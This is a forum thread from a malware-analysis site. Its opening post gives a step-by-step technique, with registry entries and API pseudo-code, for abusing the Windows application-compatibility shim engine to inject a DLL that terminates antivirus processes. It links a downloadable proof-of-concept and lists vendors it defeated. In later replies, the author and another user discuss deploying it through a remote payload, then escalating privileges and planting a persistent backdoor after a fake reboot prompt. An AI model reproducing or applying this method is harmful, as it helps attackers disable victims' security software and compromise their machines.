A forum for reverse engineering, OS internals and malware analysis 

Forum for announcements and questions about tools and software.
 #15851  by 0x16/7ton
 Tue Oct 02, 2012 10:56 am
Hello all :)

Now i show you some simple method,killing 32-bit process ...for example Kaspersky v13.0.1.4190 avp.exe :D
First of all read this:
http://technet.microsoft.com/en-us/libr ... 10%29.aspx
Okay i am called this Shims engine attack :ugeek:
Then download that ms toolkit:
http://www.microsoft.com/en-us/download ... px?id=7352
The mechanism of shims ms gives us a list of application compatibility fixes that you can view using the toolkit.
Looking at the fixes, you can quickly find very interesting for us:
-InjectDll
Fix Description:
Preloads required static DLL files for the application. Some applications use dynamically loaded DLL files, which can issue calls to static DLL files before the application is ready. This compatibility fix requires a command prompt with a list of the affected DLL files. The files are loaded in the order listed in the command prompt.

Okay.Is now task is much clear.We must create some database compatibility with our toolkit.
The database will be fixes for such processes as avp.exe :lol:
Now the points:
  • -We create our mod-compatibility
    Choose it InjectDll, as a parameter to specify the path to the executable dll.
    The best option would be the independent path: \\?\Globalroot\systemroot\[dllname]
    -Next, create a fix on the application (just think there all right). As an application, use the PE file without too much crap with the name of the necessary process :)
    Accordingly fixes in one database can be many, while compatibility modes will be one.
By creating such a base we can put her in resources .. or in our PoC cab file as you like)
Next task is to install and register a base.
It can be solved very simply and automatically, and probably a little more complicated and manual)

Automatic way
This use of the built-in utility sdbinst.exe (systemroot/system32/sdbinst.exe)
Read about it here
http://technet.microsoft.com/en-us/libr ... 10%29.aspx
But i am think it is a lazy lame way))

Manual install
First we need create two registry:
HKLM\\SOFTWARE\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom
In this registry would be store in subkey a name of process to fix,for example export reg key:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\avp.exe]
"{fbf19186-a63a-44c1-b79d-****e56cfe0e}.sdb"=hex(b):90,d1,ec,4f,21,9e,cd,01


{fbf19186-a63a-44c1-b79d-****e56cfe0e} it is a guid format of sdb base guid tag
And REG_QWORD of this subkey is returning value of GetSystemTimeAsFileTime (system date and time in UTC format)

HKLM\\SOFTWARE\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB
In this registry would be store in subkey register .sdb base

Ok.Then we must extract data and register our .sdb base...it's possible with Sdb* api from Apphelp.dll

This block of pseudo-code read guid of .sdb base,and formating this in string with ".sdb" extension
Code: Select all
	handle=SdbOpenDatabase(path_to_sdb);
	tagIdCLSID=SdbFindFirstTag(handle,rootTag,APPHELP_TAG_DATABASE_ID);
	SdbReadBinaryTag(..&mas_guid..);
	RtlStringFromGUID(&mas_guid,&guid_string);
	wcscat (guid_string,".sdb");
	SdbCloseDatabase(handle);
This block extract name of all process's from .sdb base
Code: Select all
	handle=SdbOpenDatabase(path_to_sdb);
	tagId1=SdbFindFirstTag(handle,rootTag,APPHELP_TAG_EXE);
	tagId2=SdbFindFirstTag(handle,tagId1,APPHELP_TAG_NAME);
	do
	{
	       if(tagId2!=NULL)
		{
	       	        pointer_to_string=SdbGetStringTagPtr(handle,tagId2);
			            RegInst(pointer_to_string)//install here subkey in [\\AppCompatFlags\\Custom] with process name(pointer_to_string),format guid value and system time
		}
		tagId2=SdbFindNextTag(handle,rootTag,tagId2);
	}
	while(tagId2!=NULL);
	SdbCloseDatabase(handle);
Okay now register time.
Code: Select all
	SdbRegisterDatabaseEx(path_to_sdb,0x10000,NULL)
	ShimFlushCache(0,0,0,0);
Oh and I almost forgot we need dropped our injected dll to path (systemroot\dllname)..
Code of dll is simple :)
TerminateProcess(0x29a);

It's done and must work :)

Of course there is a big minus,that current launched av would unload after rebooting system,and we still need admin priv to install .sdb base.

Okay and here i am attached my PoC-tool)
PoC AVkill
Pass:infected

(13.09 KiB) Downloaded 198 times
[/color]
Here link to video working PoC:
http://www.sendspace.com/file/k709wi

The list of av which was tested with my PoC:
Kis 2012,2013
Eset NOD32
DrWeb
Avast
McAfee
Avira
BitDefender (only 32bit)
NortonInternetSecurity
Fsecure
Panda
Outpost
ZoneAlarm

And that's all vulnerable to this method of course...
Thanks for reading..:)
 #15856  by kmd
 Tue Oct 02, 2012 2:16 pm
cool find!

aside from killing these av's... can it be considered as new way of autoloading payload dlls?

p.s.
year ago i did kis2012 bypassing with autoclicker - he installed my own app as service via windows scripting without any beep from proactive defense.
 #15860  by 0x16/7ton
 Tue Oct 02, 2012 3:32 pm
kmd wrote:cool find!

aside from killing these av's... can it be considered as new way of autoloading payload dlls?

p.s.
year ago i did kis2012 bypassing with autoclicker - he installed my own app as service via windows scripting without any beep from proactive defense.
Of cource it can,for example attack browser process :) on x86 system i inject dll into explorer.exe ,simple autorun :)
 #15861  by clapclash
 Tue Oct 02, 2012 4:48 pm
Thank you very much 0x16/7ton! I have one question for you: after establishing a connection with the target machine using a malicious payload, in order to kill the av process do i need to specify any PID or your script will just look for any av PIDs and kill them?
 #15862  by 0x16/7ton
 Tue Oct 02, 2012 4:56 pm
clapclash wrote:Thank you very much 0x16/7ton! I have one question for you: after establishing a connection with the target machine using a malicious payload, in order to kill the av process do i need to specify any PID or your script will just look for any av PIDs and kill them?
mmmm?? you read article?)It is local independent PoC,without exploitation :lol:
 #15863  by clapclash
 Tue Oct 02, 2012 5:06 pm
yes I've read the article but unfortunately I didn't get that point. Anyway suppose we're trying to exploit a target machine and once established the connection we want to escalate privileges in order to conduct a more complete attack; in this case if the target machine is running an av will easily detect the operation and reject it; now the point is: to disable the av while we're conducting a remote exploit can I use the script, just simply running it on the target machine using a shell or including the script in a payload or not?
Sorry for bothering you with so many questions but I find your post EXTREMELY interesting! Congrats!
 #15864  by 0x16/7ton
 Tue Oct 02, 2012 5:19 pm
clapclash wrote:yes I've read the article but unfortunately I didn't get that point. Anyway suppose we're trying to exploit a target machine and once established the connection we want to escalate privileges in order to conduct a more complete attack; in this case if the target machine is running an av will easily detect the operation and reject it; now the point is: to disable the av while we're conducting a remote exploit can I use the script, just simply running it on the target machine using a shell or including the script in a payload or not?
Sorry for bothering you with so many questions but I find your post EXTREMELY interesting! Congrats!
In this way payload may simply download killing module and launch it.But problem in that, you need rebooting system to complete unloading running av software:)
 #15866  by clapclash
 Tue Oct 02, 2012 5:50 pm
So the best method would be 1) send an infected file 2) target opens file 3) av killed 4) wait until reboot of target 5) exploit and gain admin priv. 6) establish permanent backdoor. What if we could include a simple set of commands that after alerting the user of a (fake) problem then it reboots the system given the user authorisation? What do u think?
 #15868  by 0x16/7ton
 Tue Oct 02, 2012 6:28 pm
clapclash wrote:So the best method would be 1) send an infected file 2) target opens file 3) av killed 4) wait until reboot of target 5) exploit and gain admin priv. 6) establish permanent backdoor. What if we could include a simple set of commands that after alerting the user of a (fake) problem then it reboots the system given the user authorisation? What do u think?
It is possible,like a social engineering attack ,but i think we offtoping :D :D :D